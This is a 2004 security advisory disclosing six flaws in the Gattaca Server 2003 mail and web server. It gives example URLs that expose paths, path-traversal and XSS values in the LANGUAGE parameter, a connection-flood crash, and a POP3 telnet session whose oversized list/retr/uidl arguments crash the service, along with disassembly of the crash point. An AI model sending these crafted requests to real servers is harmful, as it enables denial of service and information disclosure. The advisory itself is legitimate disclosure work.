www.r34ct.tk Security Advisory Advisory Name: Gattaca Server 2003 (1.1.10.0) Release Date: 07/15/2004 Application: Gattaca Server 2003 (1.1.10.0) Platform: Windows XP/NT Severity: Medium Author: dr_insane (dr_insane@pathfinder.gr) Description: A high performance Windows NT based Mail and Web Server software for building own intranet. You may register unlimited users, use unlimited domains. Supporting POP3, SMTP, and HTTP protocols. Integrated with TMPL library, allow you write own CGI scripts. Multiple vulnerabilities have been identified in Gattaca server 2003 that may allow a remote attacker to compromise a remote system. Details: Issue #1: Installation path exposure A malicious user can gain knowledge of the installation path by sending a null byte to the server. example: http://[host]/%00 Output: -------------------------------------------------------------------------------- (X)TMPL error File [C:\Program Files\Gattaca Server\doc\webadmin\index.cgi] not found or invalid Virtual Host at C:\Program Files\Gattaca Server\doc\webadmin\ -------------------------------------------------------------------------------- Issue #2: WWW-root path exposure There is a second vulnerability that can be used to reveal the WWw root directory.Input passed to the "Language" parameter in certain scripts isn't properly sanitised before being returned to the user. example: http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever] Output: (X)TMPL error File /whatever/_head.tmpl not found or invalid Virtual Host at C:\GeeOSPub\wwwroot\ -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- (X)TMPL error File /whatever/web.tmpl not found or invalid Virtual Host at C:\GeeOSPub\wwwroot\ -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- (X)TMPL error File /whatever/_foot.tmpl not found or invalid Virtual Host at C:\GeeOSPub\wwwroot\ -------------------------------------------------------------------------------- Issue #3: Denial of Service attack The third issue is a denial of service attack that can be used to to slow a remote system. The CPU usage will hit 100% and the server will become unavailable. Examples: http://[host]/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/ http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../ http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=. http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/ http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\ http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en issue #4: Cross site scripting injection Another vulnerability has been found in Gattaca server , which can be exploited by malicous people to conduct XSS attacks. This can be exploited by creating a malicious link including script code, which will be executed in a user's browser when the link is clicked or a malicious web site is visited. Successful exploitation may result in disclosure of various information (eg. cookie-based authentication information) associated with the site running OmniHTTPd or inclusion of malicious content, which the user thinks is part of the real website. examples: http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code] http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en issue #5: Denial of service attack [2] Gattacca Server fails to handle multiple open connections on ports 25/tcp and 110/tcp. By establishing about 600 connections on port 25 or port 110 the server will crash. issue #6: Denial of service attack [3] - message handling By connecting and authenticating on POP3 service a remote user can crash Gattaca service. There are multiple problems in the way the servers handles the commands list, retr and uidl. example: C:\>telnet r34ct-krew 110 +OK GeeOS/1.1 POP3 Server ver 1.0, ready :-).<3824.50a943410378@pomonis> user test +OK User name accepted, password please :-| pass w +OK GeeOS mail box open ;-) list 99999999999999999999999 retr 99999999999999999999999 uidl 98409583490583409539405 The commands above will crash the server. An error message will be generate: "Unhandled exception in: geeosserv.exe (TMAIL.DLL):0x0000005: access violation. -------------snip--------------- 0037A382 or eax,eax 0037A384 je 0037A4C5 0037A38A mov edi,eax 0037A38C shl edi,4 0037A38F cmp dword ptr [ebp+edi-7624h],0FFh 0037A397 je 0037A46F 0037A39D mov edi,eax 0037A39F shl edi,4 0037A3A2 cmp byte ptr [ebp+edi-762Ch],0 0037A3AA je 0037A416 0037A3AC mov edi,eax 0037A3AE mov esi,edi 0037A3B0 shl esi,4 ------------snip---------------- Workaround: Use another product Credit: Dr_insane Http://members.lycos.co.uk/r34ct/ Feedback Please send your comments to: dr_insane@pathfinder.gr